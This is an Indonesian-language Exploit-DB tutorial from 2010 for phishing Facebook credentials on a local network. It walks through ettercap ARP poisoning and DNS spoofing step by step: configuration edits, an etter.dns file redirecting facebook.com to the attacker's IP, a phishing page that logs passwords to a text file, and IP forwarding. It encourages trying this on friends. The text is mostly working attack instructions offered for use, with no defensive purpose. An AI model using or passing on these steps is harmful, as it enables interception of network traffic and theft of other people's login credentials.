[Indonesian] Implementasi Pishing Dengan Teknik DNS Spoofing

EDB-ID:

14800

CVE:

N/A


Author:

yur4kh4

Type:

papers


Platform:

Multiple

Date:

2010-08-26


 _                              _  _   _    _     _  _   
| |__  _   _   _   _ _   _ _ __| || | | | _| |__ | || |  
| '_ \| | | | | | | | | | | '__| || |_| |/ / '_ \| || |_ 
| |_) | |_| | | |_| | |_| | |  |__   _|   <| | | |__   _|
|_.__/ \__, |  \__, |\__,_|_|     |_| |_|\_\_| |_|  |_|  
       |___/   |___/                                     							,.Indonesian Hakers.,
========================================================================================================================================================
------------------------------------------------------------------/
[~] Title     : Implementasi Pishing Dengan Teknik DNS Spoffing
[~] Date      : 26-08-2010
[~] Author    : yur4kh4
[~] Contact   : yur4kh4[at]yahoo[d0t]com
[~] Web       : http://www.devirakhjib.co.cc/
[~] Language  : Indonesian
[~] Tested 0n : ubuntu 10.4 (lucid)
------------------------------------------------------------------/
[*] berpatah-patah Kata
	tulisan ini di khususkan untuk para newbie
	di kemas dengan sedikit bahasa 4la4y..ahahaha..namun tetap menjunjung tinggi ide0logi ketampanan...wekzz.,.,
	mohon maav sy sampai kan di awal tulisan,,karena sy sadar sangat banyak sekali kekurangan dalam tulisan ini...
	kekurangan itu tidak lepas dari keterbatasan,,,ilmu pengetahuan sy,,..& kehendak yang maha kuasa.,.:p

[@] Persiapan	
implementasi pishing dengan teknik DNS spoffing..
teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita..:P


yang perlu kita siapkan..
1. apache server <sudo apt-get install apache2>
2. php <sudo apt-get install php5>
3. ettercap <sudo apt-get install ettercap>
4. script pishing <cari di google or buat sendiri..or conntact sy...whatever do U want wes...:D>
5. mental yg kuat & sedang tidak dalam keadaan mabuk.akakakaka.,.

sy anggap semua peralatan sudah di install..
cek apache2 yg di install tadi, ketik "localhost" pada web browser ente yang ganteng2.,.:D 
klo ada tulisan "its works" <<tandanya installasi berlangsung mulus....yeess,,,
file index default dari server apache ada di /var/www
klo ga percaya cek saja...:D
yur4@localhost /var/www $ ls
index.html
tuch kan...cb buka file index nya...:p..wekz.,.bener kan kata sy...:p
wokey...cukup main-mainnya...

[@] configure

	konfigurasi ettercap <ini paling penting> 
tempat konfigurasinya ada di /etc/etter.conf
yur4@localhost $ sudo gedit /etc/etter.conf
maka akan membuka file etter.conf dengan menggunakan gedit..
selanjutnya cari
#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hilangkan tanda pagarnya..sehingga menjadi sepert ini
#---------------
#     Linux 
#---------------

# if you use ipchains:
   redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan...script
kalo sudah save...& jangan di ingat-ingat lagi...ahahahaa
selanjutnya..
rubah file etter.dns yang terdapat di /usr/share/ettercap
yur4@localhost $ gedit /usr/share/ettercap/etter.dns
delete isi etter.dns defaultnya & ganti menjadi seperti ini
============================cut here=============================
facebook.com      A   10.10.10.6
*.facebook.com    A   10.10.10.6
www.facebook.com  PTR 10.10.10.6      # Wildcards in PTR are not allowed
============================cut here=============================
sedikit penjelasan
facebook.com	 = site yang akan kita pishing
10.10.10.6		 = IP attacker
NB: 
untuk melihat ip 
yur4@localhost $ ifconfig
kemudian save...

selanjutnya...copy file-file pishing kita k /var/www
biasanya ada 3 file..index.php terserah.txt logs.php
sebelumnya di hapus aja dulu index.html defaultnya y...
beri perintah gini di file terserah.txt agar bisa di eksekusi..
root@localhost /var/www $ touch terserah.txt
root@localhost /var/www $ chmod 777 terserah.txt
wokeyy...saya anggap sudah di copy y...

[@] eksekusi

	next...buka ettercap ente..
sekedar berbagi pengalaman sajjha..klo sy lebih suka membuka ettercap menggunakan mode console...:D

yur4@localhost $ sudo ettercap -C=mode/ -i=intercafe <nama network card>
-C bisa di ganti dengan -G=mode gui -T=mode text..
misal :
yur4@localhost $ ettercap -C -i eth0

sy akan melakukan sniffing pada network card LAN (local area network)
di sesuaikan sajjha dengan network card yg activ di leppy or PC ente..
next...
pilih tab "sniff" >> unified sniffing >>pilih network card yg aktiv...[enter]
selanjutnya pada tab "host">>scan host....
kemudia berangkat k tab "plugins">> manage the plugins
aktivkan autoadd & dns_spoff
selanjutnya pada tab "mitm" >>arp poisoning..[centang/enter]
kemudia terakhir ke tab "start">>start sniffing...:)
wew.,rumit dech kyx ych.,.hee...ngga' kq sebenarnya.,.klo dh biasa ga rumit kq..:p
jangan senang dulu haruz ada 1 hal lagi di lakukan...:p
yaitu meng-forward ip / berpura2 menjadi server lach.,.wekzz.,..
langsung sajjha...masuk ke terminal ketikan perintah ini..
yur4@localhost $ sudo nano /proc/sys/net/ipv4/ip_forward
password : masukan password ente..
ganti angka 0 dengan angka 1 kemudian save....(ctrl+x >>y>>enter)

[@] Penutup

sippzzz...tinggal tunggu az dech....:p
lakukan dengan teman anda agar bisa langsung melihat hasilnya...tp kalo ga percaya...
silahkan buka facebook.com
login dech..
seperti biasa password akan tersimpan di terserah.txt
bisa lihat di http://localhost/terserah.txt

tulisan ini sangat susah di mengerti...ahaha..sy yang nuliz az bingung aplgi kalian yang baca.,.:p
klo memang seriuz...conntact saja sy..^_^..tanyakan semua yang belum jelas...
& mudah-mudahan sy bisa jawab yach.,.amin.,.:p

+++++++++++++++++++thankz t0++++++++++++++++++++++++
[&] allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew - kill-9 - Indonesian coder 
[%] Arianom, Tukulesto , marahmerah , kamtiez , vYc0d , xr0b0t
    contrex , mboys , Pathloader , rifky , Thunder x c0de, jundab 
    ibl13z , geni212 , dhomas , kalong666 ,ichal ,tucker ,

		&&**akulukasaatkaupergi**&&
+++++++++++++++++++Luv der4+++++++++++++++++++++++++